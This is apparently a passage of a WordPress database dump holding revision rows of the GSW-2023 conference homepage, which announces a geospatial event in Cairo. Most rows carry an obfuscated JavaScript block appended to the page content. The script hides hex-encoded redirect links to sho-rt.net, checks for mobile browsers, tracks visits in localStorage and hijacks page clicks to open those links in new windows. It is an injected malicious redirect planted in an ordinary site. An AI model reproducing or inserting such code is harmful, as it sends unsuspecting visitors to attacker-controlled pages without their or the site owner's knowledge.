Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:08:17','2022-11-09 18:08:17','',3066,'https://gsw2023.com/?p=3179',0,'revision','',0),
(3180,1,'2022-11-09 18:09:31','2022-11-09 18:09:31','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:09:31','2022-11-09 18:09:31','',3066,'https://gsw2023.com/?p=3180',0,'revision','',0),
(3181,1,'2022-11-09 18:10:22','2022-11-09 18:10:22','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017293423{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text 